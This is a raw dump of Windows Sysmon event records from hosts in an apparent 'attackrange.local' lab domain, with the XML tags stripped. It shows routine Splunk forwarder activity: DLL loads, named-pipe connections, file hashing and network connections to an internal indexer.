18141800x80000000000000001531240Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:34.007{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531239Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:34.007{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 23542300x80000000000000001094901Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:27.611{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F89F2674C1735425613A366B67B94EF0,SHA256=C73FE626755AAC394B7AC09F33E92F3D2035490F205D7D8DD50D72D8CC11BF65,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001605603Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:25.671{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49719-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001605602Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:27.142{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001605601Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:27.142{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=98E4D629711A9E541EDC5F45BB97E696,SHA256=A71B1C2CAA326D726A704D105ECAC345D2DBBEADDB7AAECA4CDBF7BD3E733A40falsefalse - insufficient disk space 11241100x80000000000000001605600Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:27.141{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001605599Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:27.141{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56F5CA7F3260ADD61E3FF31809F7B355,SHA256=F1D21BE6F600BC58D4B0B73E3CF89F61ACAFAB337B7027E13BDB791D27959F12falsefalse - insufficient disk space 11241100x80000000000000001605598Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:27.140{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605597Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:27.140{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17050F72BB95C9A107C4E986C8903494,SHA256=617F281DD83EFD277B3FBCE14301A097B2D0FBC4F61DEFD81A6153C0FD27992Afalsefalse - insufficient disk space 10341000x80000000000000001094900Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:27.468{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094899Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:27.468{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094904Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:28.617{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA1D00F63593666DA2B16D76057BD271,SHA256=355BDA3C30C39805A4546EDA8A1D63243B5AB8D37C2C2D5953B3E0124178858A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001605605Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:28.144{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605604Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:28.144{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F0AAB6ADE08BE0E4A572EF358730CC6,SHA256=C428C4293B9B50FED1FEE60C13EB7415D583E97B27F2BE955B1EE5960653FA8Afalsefalse - insufficient disk space 10341000x80000000000000001094903Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:28.469{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094902Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:28.469{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094909Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:29.627{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48D43A0C11FB6B72C0857A44F6BC1D7A,SHA256=1D575A05D21C9C32F159E18AABBFF156B26DEEDD4AA338F88721ED529E35F2A1,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001605607Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:29.265{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605606Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:29.265{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54F07FA22F24999997A5D23C89A3A453,SHA256=CEBDB75AB3B225674230657A4CB92DDF991919C99665DBFABE5D57FC505F195Afalsefalse - insufficient disk space 354300x80000000000000001094908Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:24.830{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1134-false10.0.1.12-8000- 10341000x80000000000000001094907Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:29.470{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094906Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:29.470{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094905Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:29.236{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57747F71B7566BFF3B928F341CBEEBA7,SHA256=F5B23D0885271DA0B2DB29411BA9DA87312EE0379CC5A4C8ACF95B05E6C02699,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001094912Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:30.631{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C103136AD687371A3CF63709414D2C3C,SHA256=6DF1104222492F7101CBDFD5D190885E1F56EAB4F46E09886CA75AC1EB808D35,IMPHASH=00000000000000000000000000000000falsetrue 534500x80000000000000001605665Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.484{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001605664Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.484{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x80000000000000001605663Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.484{21761711-7A4A-6080-BC60-00000000BB01}62161852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001605662Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.484{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001605661Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.484{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001605660Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.368{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001605659Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.368{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001605658Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.368{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001605657Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:30.368{21761711-7A4A-6080-BC60-00000000BB01}6216\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001605656Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.368{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001605655Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:30.368{21761711-7A4A-6080-BC60-00000000BB01}6216\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001605654Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.368{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001605653Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.368{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001605652Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.368{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001605651Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.368{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001605650Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.368{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001605649Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.368{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001605648Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.368{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001605647Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001605646Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001605645Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001605644Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001605643Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001605642Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001605641Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001605640Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001605639Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:30.352{21761711-7A4A-6080-BC60-00000000BB01}6216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001605638Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 